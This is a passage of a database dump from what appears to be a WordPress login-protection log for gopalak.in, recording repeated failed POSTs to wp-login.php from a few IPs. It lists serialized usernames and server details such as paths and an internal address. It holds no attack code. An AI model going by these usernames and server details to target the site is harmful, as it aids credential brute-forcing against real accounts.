bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65008\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048573.5937281;s:12:\"REQUEST_TIME\";i:1746048573;}}','196.251.112.104',1,'2025-05-01 02:59:35','2025-05-01 03:14:50'),(94648,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65004\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048573.575314;s:12:\"REQUEST_TIME\";i:1746048573;}}','196.251.112.104',1,'2025-05-01 02:59:35','2025-05-01 03:14:50'),(94649,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64426\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048717.471581;s:12:\"REQUEST_TIME\";i:1746048717;}}','196.251.112.104',1,'2025-05-01 03:01:59','2025-05-01 03:14:50'),(94650,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64428\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048717.500598;s:12:\"REQUEST_TIME\";i:1746048717;}}','196.251.112.104',1,'2025-05-01 03:01:59','2025-05-01 03:14:50'),(94651,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64424\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048717.4709809;s:12:\"REQUEST_TIME\";i:1746048717;}}','196.251.112.104',1,'2025-05-01 03:01:59','2025-05-01 03:14:50'),(94652,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64427\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048717.4723771;s:12:\"REQUEST_TIME\";i:1746048717;}}','196.251.112.104',1,'2025-05-01 03:01:59','2025-05-01 03:14:50'),(94653,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64431\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048717.5127051;s:12:\"REQUEST_TIME\";i:1746048717;}}','196.251.112.104',1,'2025-05-01 03:01:59','2025-05-01 03:14:50'),(94654,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45544\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048747.863946;s:12:\"REQUEST_TIME\";i:1746048747;}}','185.232.41.148',0,'2025-05-01 03:02:29','1970-01-01 00:00:00'),(94655,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49589\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048888.813982;s:12:\"REQUEST_TIME\";i:1746048888;}}','196.251.112.104',1,'2025-05-01 03:04:50','2025-05-01 03:14:50'),(94656,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49590\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048888.820514;s:12:\"REQUEST_TIME\";i:1746048888;}}','196.251.112.104',1,'2025-05-01 03:04:50','2025-05-01 03:14:50'),(94657,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49591\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048888.825067;s:12:\"REQUEST_TIME\";i:1746048888;}}','196.251.112.104',1,'2025-05-01 03:04:50','2025-05-01 03:14:50'),(94658,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49593\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048888.8266809;s:12:\"REQUEST_TIME\";i:1746048888;}}','196.251.112.104',1,'2025-05-01 03:04:50','2025-05-01 03:14:50'),(94659,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 